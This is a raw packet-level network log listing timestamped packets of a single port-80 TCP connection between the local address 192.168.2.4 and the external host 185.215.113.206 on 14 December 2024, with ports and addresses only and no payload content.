Dec 14, 2024 12:56:37.844547987 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.844614029 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.844660997 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.845419884 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.845519066 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.845535994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.845599890 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.846404076 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.846453905 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.846509933 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.847352028 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.847398043 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.847429037 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.848304987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.848351955 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.848407030 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.849200010 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.849252939 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.849323988 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.849369049 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.850127935 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.850186110 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.850248098 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.850291967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.851104975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.851161003 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.851208925 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.851253033 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.852005005 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.852137089 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.852185965 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.852948904 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.853076935 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.853123903 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.853873014 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.853919029 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.853986025 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.854376078 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.854815960 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.854861021 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.854928017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.854974031 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.855715990 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.855765104 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.893477917 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.893528938 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.893538952 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.893569946 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.893671989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.893718004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.893786907 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.893835068 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.894591093 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.894638062 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.894695044 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.894742966 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.895498037 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.895546913 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.895600080 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.895648003 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.896411896 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.896460056 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.896560907 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.896609068 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.897371054 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.897418976 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.897495031 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.897542953 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.898274899 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.898324966 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.898334980 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.898395061 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.899215937 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.899265051 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.899276972 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.899333000 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.900286913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.900386095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.900439978 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.901216984 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.901267052 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.901314974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.901360035 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.902091980 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.902138948 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.902147055 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.902187109 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.903090000 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.903126001 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.903136969 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.903165102 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.903949022 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.904146910 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.904151917 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.904191971 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.904884100 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.905040026 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.905042887 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.905103922 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.905828953 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.905883074 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.905922890 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.906052113 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.906719923 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.906770945 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.906841993 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.906955004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.907685041 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.907736063 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.907820940 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.907865047 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.908633947 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.908679008 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.908739090 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.908783913 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.909553051 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.909600019 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.909666061 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.909710884 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.910476923 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.910537004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.910578012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.910624027 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.967586040 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.967639923 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.967645884 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.967680931 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.967773914 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.967820883 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.967886925 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.967930079 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.968964100 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.969018936 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.969067097 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.969892025 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.969944954 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.969990969 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.970576048 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.970632076 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.970640898 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.970673084 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.971503973 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.971575022 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.971632004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.971806049 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.972440004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.972491026 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.972551107 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.973392010 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.973438978 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.973507881 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.974292040 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.974335909 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.974419117 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.974484921 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.975234985 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.975303888 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.975389004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.975433111 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.026968956 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.027024031 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.027056932 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.027089119 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.027156115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.027194023 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.027200937 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.027287960 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.028276920 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.028341055 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.028430939 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.028472900 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.028991938 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.029124975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.029172897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.029896975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.029944897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.030030012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.030078888 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.030874968 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.030926943 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.030987024 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.031049967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.031912088 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.031961918 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.031969070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.032015085 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.032768011 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.032815933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.032905102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.032951117 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.033641100 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.033690929 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.033772945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.033821106 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.034615993 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.034665108 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.034734964 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.034785986 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.035527945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.035578966 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.035743952 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.035835981 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.036467075 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.036514997 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.036586046 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.036632061 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.037437916 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.037492037 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.037558079 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.037650108 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.038393021 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.038438082 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.038516998 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.038559914 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.039352894 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.039408922 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.039431095 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.039468050 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.040283918 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.040329933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.040404081 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.040455103 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.041241884 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.041290045 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.041363001 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.041408062 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.042196989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.042237997 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.042372942 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.042468071 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.043282986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.043387890 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.043418884 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.043441057 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.044500113 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.044548988 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.044584990 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.044629097 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.045808077 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.045855045 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.045981884 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.046030045 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.046792030 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.046880007 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.046953917 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.047003984 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.047904015 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.047956944 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.048024893 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.048075914 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.048868895 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.048918009 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.085465908 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.085517883 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.085553885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.085557938 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.085577965 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.085655928 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.085656881 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.085700989 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.086496115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.086607933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.086615086 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.086685896 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.087452888 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.087506056 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.087508917 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.087582111 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.088346004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.088402987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.088457108 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.089315891 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.089370012 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.089426041 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.090286970 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.090336084 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.090342999 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.090718985 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.091157913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.091212988 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.091212988 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.091255903 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.092221975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.092266083 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.092371941 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.092417002 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.093106985 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.093158007 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.093159914 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.093962908 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.094007969 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.094053984 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.094118118 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.094161987 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.094959974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.095055103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.095101118 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.095850945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.095912933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.095983028 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.096036911 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.096800089 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.096849918 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.096937895 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.097804070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.097847939 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.097867012 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.097903967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.098675013 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.098865986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.098918915 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.099631071 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.099692106 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.099723101 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.099771023 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.100596905 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.100667953 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.100712061 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.100766897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.101495028 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.101613998 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.101670027 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.102467060 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.102601051 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.102648973 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.159495115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.159571886 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.159619093 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.159754038 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.159806967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.159831047 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.160679102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.160722017 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.160767078 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.160813093 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.161590099 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.161659956 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.161732912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.161811113 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.162527084 CET	80	49834	185.215.113.206	192.168.2.4
